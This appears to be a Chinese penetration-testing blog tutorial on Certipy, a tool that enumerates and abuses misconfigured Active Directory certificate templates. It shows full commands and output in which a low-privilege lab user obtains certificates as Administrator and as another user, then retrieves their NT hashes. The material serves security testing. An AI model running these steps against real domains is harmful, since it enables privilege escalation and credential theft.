[web渗透]渗透测试流程,如何使用Certipy检测活动目录证书安全
[web渗透]之:渗透测试流程,如何使用Certipy检测活动目录证书安全
关于Certipy
Certipy是一款基于Python开发的强大工具,该工具可以帮助广大研究人员枚举并利用活动目录证书服务(AD CS)中的错误配置项。
工具安装
广大研究人员可以使用下列命令将该项目源码克隆至本地:
git clone https://github.com/ly4k/Certipy.git
接下来,在命令行终端中切换至项目根目录,然后运行下列命令即可:
$ python3 setup.py install
别忘了将Python脚本目录添加至系统环境变量路径中。
工具使用
$ certipy -h usage: certipy [-h] [-debug] [-target-ip ip address] [-nameserver nameserver] [-dns-tcp] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-dc-ip ip address] ???????????????target {find,req,auth,auto} ... ? Active Directory certificate abuse ? positional arguments: ??target ???????????????[[域名/]用户名[:密码]@]目标名称或地址> ??{find,req,auth,auto} ?操作 ????find ???????????????查找证书模板 ????req ????????????????请求一份新的证书 ????auth ???????????????使用证书进行认证 ????auto ???????????????自动利用证书实现提权 ? optional arguments: ??-h, --help ?????????????显示帮助信息 ??-debug ???????????????开启调试模式输出 ??-no-pass ?????????????不询问密码 ??-k ???????????????????使用Kerberos认证。 ??-dc-ip ip address ???????目标域控制器的IP地址 ? connection: ??-target-ip ip address ????????????????????????目标设备的IP地址 ??-nameserver nameserver??用于DNS解析的域名服务器 ??-dns-tcp ??????????????使用TCP代替UDP执行DNS查询 ? authentication: ??-hashes LMHASH:NTHASH ????????????????????????NTLM hashes, format is LMHASH:NTHASH
工具使用样例
自动化
在下面的使用样例中,用户john是一个低权限用户,可以注册Copy of Web Server模板:
$ certipy 'predator/john:Passw0rd@dc.predator.local' auto [*] Trying template 'Copy of Web Server' with CA 'predator-DC-CA' [*] Generating RSA key [*] Requesting certificate [*] Request success [*] Got certificate with UPN 'Administrator' [*] Saved certificate to '1.crt' [*] Saved private key to '1.key' [*] Using UPN: 'Administrator@predator' [*] Trying to get TGT... [*] Saved credential cache to 'Administrator.ccache' [*] Trying to retrieve NT hash for 'Administrator@predator' [*] Got NT hash for 'Administrator@predator': fc525c9683e8fe067095ba2ddc971889
默认情况下,工具会选择Administrator用户,我们也可以使用-user参数来为其他用户创建证书。
查找
find操作将帮助我们查找一个或多个CA启用了的证书模板。
查找漏洞模板
使用-vulnerable参数将搜索存在漏洞的证书模板:
$ certipy 'predator/john:Passw0rd@dc.predator.local' find -vulnerable [*] Finding vulnerable certificate templates for 'john' User ??Name ?????????????????????????????????: predator\john ??Groups ???????????????????????????????: Certificate Authorities ??0 ????CA Name ????????????????????????????: predator-DC-CA ????DNS Name ???????????????????????????: dc.predator.local ????Certificate Subject ????????????????: CN=predator-DC-CA, DC=predator, DC=local ????Certificate Serial Number ??????????: 1976D0FEFCAFC9A84D02D305FA88D84D ????Certificate Validity Start ?????????: 2021-10-06 11:32:01+00:00 ????Certificate Validity End ???????????: 2026-10-06 11:42:01+00:00 ????User Specified SAN ?????????????????: Disabled ????CA Permissions ??????Owner ????????????????????????????: BUILTIN\Administrator ??????Access Rights ????????ManageCertificates ?????????????: BUILTIN\Administrator ??????????????????????????????????????????predator\Domain Admins ??????????????????????????????????????????predator\Enterprise Admins ????????ManageCa ???????????????????????: BUILTIN\Administrator ??????????????????????????????????????????predator\Domain Admins ??????????????????????????????????????????predator\Enterprise Admins ????????Enroll ?????????????????????????: Authenticated Users Vulnerable Certificate Templates ??0 ????CAs ????????????????????????????????: predator-DC-CA ????Template Name ??????????????????????: Copy of Web Server ????Validity Period ????????????????????: 2 years ????Renewal Period ?????????????????????: 6 weeks ????Certificate Name Flag ??????????????: EnrolleeSuppliesSubject ????Enrollment Flag ????????????????????: None ????Authorized Signatures Required ?????: 0 ????Extended Key Usage ?????????????????: ????Permissions ??????Enrollment Permissions ????????Enrollment Rights ??????????????: predator\Domain Admins ??????????????????????????????????????????predator\Enterprise Admins ??????????????????????????????????????????Authenticated Users ??????Object Control Permissions ????????Owner ??????????????????????????: predator\Administrator ????????Write Owner Principals ?????????: predator\Domain Admins ??????????????????????????????????????????predator\Enterprise Admins ??????????????????????????????????????????predator\Administrator ????????Write Dacl Principals ??????????: predator\Domain Admins ??????????????????????????????????????????predator\Enterprise Admins ??????????????????????????????????????????predator\Administrator ????????Write Property Principals ??????: predator\Domain Admins ??????????????????????????????????????????predator\Enterprise Admins ??????????????????????????????????????????predator\Administrator ????Vulnerable Reasons ?????????????????: 'Authenticated Users' can enroll, enrollee supplies subject and template allows authentication ??????????????????????????????????????????'Authenticated Users' can enroll and template has dangerous EKU
使用-user参数将查找指定用户相关的存在漏洞的证书模板,默认配置下使用的是当前用户。
查找所有模板
$ certipy 'predator/john:Passw0rd@dc.predator.local' find [*] Finding certificate templates for 'john' User ??Name ?????????????????????????????????: predator\john ??Groups ???????????????????????????????: Certificate Authorities ??0 ????CA Name ????????????????????????????: predator-DC-CA ????DNS Name ???????????????????????????: dc.predator.local ????Certificate Subject ????????????????: CN=predator-DC-CA, DC=predator, DC=local ????Certificate Serial Number ??????????: 1976D0FEFCAFC9A84D02D305FA88D84D ????Certificate Validity Start ?????????: 2021-10-06 11:32:01+00:00 ????Certificate Validity End ???????????: 2026-10-06 11:42:01+00:00 ????User Specified SAN ?????????????????: Disabled ????CA Permissions ??????Owner ????????????????????????????: BUILTIN\Administrator ??????Access Rights ????????ManageCertificates ?????????????: BUILTIN\Administrator ??????????????????????????????????????????predator\Domain Admins ??????????????????????????????????????????predator\Enterprise Admins ????????ManageCa ???????????????????????: BUILTIN\Administrator ??????????????????????????????????????????predator\Domain Admins ??????????????????????????????????????????predator\Enterprise Admins ????????Enroll ?????????????????????????: Authenticated Users Certificate Templates ??0 ????CAs ????????????????????????????????: predator-DC-CA ????Template Name ??????????????????????: User ????Validity Period ????????????????????: 1 year ????Renewal Period ?????????????????????: 6 weeks ????Certificate Name Flag ??????????????: SubjectRequireDirectoryPath ??????????????????????????????????????????SubjectRequireEmail ??????????????????????????????????????????SubjectAltRequireEmail ??????????????????????????????????????????SubjectAltRequireUpn ????Enrollment Flag ????????????????????: AutoEnrollment ??????????????????????????????????????????PublishToDs ??????????????????????????????????????????IncludeSymmetricAlgorithms ????Authorized Signatures Required ?????: 0 ????Extended Key Usage ?????????????????: Encrypting File System ??????????????????????????????????????????Secure Email ??????????????????????????????????????????Client Authentication ????Permissions ??????Enrollment Permissions ????????Enrollment Rights ??????????????: predator\Domain Admins ??????????????????????????????????????????predator\Domain Users ??????????????????????????????????????????predator\Enterprise Admins ??????Object Control Permissions ????????Owner ??????????????????????????: predator\Enterprise Admins ????????Write Owner Principals ?????????: predator\Domain Admins ??????????????????????????????????????????predator\Enterprise Admins ????????Write Dacl Principals ??????????: predator\Domain Admins ??????????????????????????????????????????predator\Enterprise Admins ????????Write Property Principals ??????: predator\Domain Admins ??????????????????????????????????????????predator\Enterprise Admins [...] ??11 ????CAs ????????????????????????????????: predator-DC-CA ????Template Name ??????????????????????: Copy of Web Server ????Validity Period ????????????????????: 2 years ????Renewal Period ?????????????????????: 6 weeks ????Certificate Name Flag ??????????????: EnrolleeSuppliesSubject ????Enrollment Flag ????????????????????: None ????Authorized Signatures Required ?????: 0 ????Extended Key Usage ?????????????????: ????Permissions ??????Enrollment Permissions ????????Enrollment Rights ??????????????: predator\Domain Admins ??????????????????????????????????????????predator\Enterprise Admins ??????????????????????????????????????????Authenticated Users ??????Object Control Permissions ????????Owner ??????????????????????????: predator\Administrator ????????Write Owner Principals ?????????: predator\Domain Admins ??????????????????????????????????????????predator\Enterprise Admins ??????????????????????????????????????????predator\Administrator ????????Write Dacl Principals ??????????: predator\Domain Admins ??????????????????????????????????????????predator\Enterprise Admins ??????????????????????????????????????????predator\Administrator ????????Write Property Principals ??????: predator\Domain Admins ??????????????????????????????????????????predator\Enterprise Admins ??????????????????????????????????????????predator\Administrator
查询请求
用户josh将会以用户jane的身份请求一个有效的身份认证证书,predator-DC-CA已启用了Copy of Web Server:
$ certipy 'predator/john:Passw0rd@dc.predator.local' req -template 'Copy of Web Server' -ca 'predator-DC-CA' -alt 'jane' [*] Generating RSA key [*] Requesting certificate [*] Request success [*] Got certificate with UPN 'jane' [*] Saved certificate to '2.crt' [*] Saved private key to '2.key'
以当前用户身份请求证书
$ certipy 'predator/john:Passw0rd@dc.predator.local' req -template 'User' -ca 'predator-DC-CA' [*] Generating RSA key [*] Requesting certificate [*] Request success [*] Got certificate with UPN 'john@predator.local' [*] Saved certificate to '3.crt' [*] Saved private key to '3.key'
身份认证
auth操作将会使用PKINIT Kerberos扩展来对提供的证书进行身份认证:
$ certipy 'predator/jane@dc.predator.local' auth -cert ./2.crt -key ./2.key [*] Using UPN: 'jane@predator' [*] Trying to get TGT... [*] Saved credential cache to 'jane.ccache' [*] Trying to retrieve NT hash for 'jane@predator' [*] Got NT hash for 'jane@predator': 077cccc23f8ab7031726a3b70c694a49
项目地址
Certipy:【GitHub传送门】
参考资料
https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf
https://github.com/dirkjanm/PKINITtools
本文话题是[web渗透]渗透测试流程,如何使用Certipy检测活动目录证书安全